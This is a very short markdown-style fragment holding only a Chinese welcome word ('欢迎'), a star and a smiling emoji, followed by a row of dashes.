| 欢迎⭐ 😁 --------------------------------------------------------------------------------